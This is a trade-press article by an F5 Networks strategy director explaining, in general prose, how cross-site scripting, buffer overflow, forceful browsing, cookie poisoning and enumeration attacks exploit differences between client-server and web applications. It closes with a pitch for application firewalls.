|
Companies are moving towards their mission-critical applications into web
browsers. Unfortunately, many of the features that make browsers so convenient
are sometimes also the one's that make them incredibly insecure. The resulting
identity theft has become a major concern to corporations and consumers alike
Web vulnerabilities open a door for hackers to gain access to corporate
systems and private customer data. The resultant privacy and compliance
concerns, including identity theft, have become concerns of both corporations
and consumers.
“It's essential that we protect our constituents' personal information. And
this is not a static concern, because hackers continue to adapt to
progressively sophisticated technologies,” said Chad O'Neal, Web Technical
Engineer, Blue Cross and Blue Shield, Kansas City. “To mitigate security risks,
organizations need continuous visibility into who's attempting to access what
information,” added Chad.
Companies are taking action to safeguard their applications, but traditional
firewalls and other tools that protect at the network level do little to turn
back probing attacks that exploit an application's specific vulnerabilities.
Most of the solutions available today only protect against known attacks.
Relying on this kind of negative security logic exposes companies to dangerous
and targeted hacker activity. To successfully maintain data security, companies
need to shore up their application security.
 |
|
Andrew Stern |
The root problem
Since web browsers can act in unexpected ways, web-based applications are
inherently vulnerable. Once a user is logged into an application, the security
of the application itself is the only thing restricting access to other users'
data.
Therein lies the problem. Most of the security holes in corporate IT
infrastructure are based not on worms or viruses, but on vulnerabilities in the
applications themselves. The majority of today's client applications were
written to work in tandem with a specific server application. This client-server
model resulted in robust, secure applications.
Application differences and exploits
Four key differences between client-server and web-based applications are
the cause of most of the common security breaches that occur today. Hackers
exploit the variations between the two types of applications using several
common attack methods.
(Difference 1) Heavy client vs browser: Client-server applications rely on
the client to do the heavy lifting and perform the majority of data validation,
which makes it difficult to modify input to the server. With browsers, the
source of the client-side application is available to anyone accessing the web
page, and is therefore easy to change.
Exploiting the difference: Tricking the browser
Unlike heavy clients, browsers are easy to trick, opening the door for
attacks such as buffer overflow and cross-site scripting.
Buffer overflow overruns a parameter's memory allocation, which can
compromise the entire application. For example, a field might always expect a
10-digit phone number, so developers will allocate just enough memory to handle
those 10 digits. If hundreds of digits are entered, the server application will
eat into memory allocated to different tasks, potentially causing a core dump
and providing hackers with information stored in the server's memory. Even more
threatening buffer overflows can also tunnel through the server to deeper
infrastructure. A hacker who disables a system in this way could upload code to
be executed by the server, as was the case with the Code Red and Slammer
viruses.
Cross-site scripting is an attack that inserts malicious script into web
pages viewed by others. Most common sites for this are bulletin boards or
auction sites, where users can submit comments. Malicious users could fill out
an auction for an item, and at the bottom of the description include script that
includes the current user's cookie value on the image request. Anyone viewing
this auction item will now send his or her cookie information to a web server of
the hacker's choosing, which can then be used to steal the identities of users
by impersonating them on websites.
To protect against buffer overflow and cross-site scripting attacks, servers
must carefully check all inputs from the client and monitor for malicious
characters. Network devices that perform this function, however, generate many
false negatives, since they do not understand where this kind of script might be
allowed.
(Difference 2) One program vs many scripts: Client-server applications
typically have one program communicating with a client. In the web environment
there are multiple scripts, running on many different web servers, with many
different entry points.
Exploiting the difference: Jumping out of order
Because web applications use many different scripts and files, altering the
URL in a browser will often allow hackers to jump over certain pages and gain
access to restricted pages. An attack of this kind is called 'broken access
control' or 'forceful browsing'.
“Forceful browsing has become more acute, in part, because processes used to
be initiated and executed in a uniform, sequential manner over a single
connection,” noted Michael Suby, Program Director-Business Market Strategies,
Stratecast. “In contrast, web applications are non-linear, and normally do not
rely on previous processes to complete and notify the application before a
'next' process can begin. This non-linear nature is attractive to hackers
because it creates multiple application entry points. An attacker can often
bypass or compromise standard blocking procedures, such as login sequences, to
access processes that would typically only be available to a user after
producing the appropriate credentials.”
(Difference 3) State vs no state: In a client-server environment, there is a
single, uninterrupted connection, so it's easy to track where users have been
and where they are going. Web protocols don't have sessions, so developers have
to find a different way to track a user's so-called 'state' within the
application.
Exploiting the difference: Manipulating 'state' tools
The most common tools developers use to track state are cookies, dynamic
parameters and dynamic links, each of which is vulnerable to different types of
attack.
Cookies, which contain a unique identification tag that enables a server to
recognize a user, can be 'poisoned' by using an intercept proxy or by modifying
them directly on a hard drive before sending a request. By changing a cookie,
hackers can fraudulently identify themselves to bypass authentication pages.
To protect against cookie poisoning and dynamic field tampering, applications
must be modified to use encrypted cookies to store information. In case of
cookie poisoning, code would have to be added in every instance where cookies
are used-a relatively easy fix but a considerable expenditure of time and
resources.
(Difference 4) Hundreds of users vs millions of users: Applications built for
the client-server environment were designed to handle hundreds of users. Web
servers, by contrast, frequently handle millions of users, which increases the
chances that a malicious attack will be successful.
Exploiting the difference: Playing the numbers game
Hackers use to their advantage an application's millions of users by
launching enumeration attacks, which force a server to list the various
resources stored on it, such as user names and other database information.
For example, to circumvent a website's protocol that suspends usage rights
after a set number of login attempts, a hacker could write a script that would
use one Social Security number after another, with the same PIN. Using a common
PIN, such as 123456 or password, the script will get at least one account in a
matter of hours and all accounts within days.
To solve the problem of enumeration, applications can be redesigned to
monitor for abnormally high access of a login page, although the effect of this
is to penalize all users by extending the response time for everyone.
Preventing intrusions
Combating the security threats posed by malicious attacks is time consuming,
expensive and sometimes unreliable. Code reviews, extensive penetration testing
and network monitoring devices are a few ways that companies are battling a
growing problem. Unfortunately, most of these strategies take a defensive
approach, adequately protecting applications from known, generalized attacks but
doing little to safeguard against more malicious, targeted assaults.
Proactive application firewalls that can defend against unexpected browser
activity provide companies with more reliable, cost-effective security, enabling
them to deliver safe and dependable services to their customers.
(The author is Director-Strategy, F5 Networks) Page(s) 1
| 
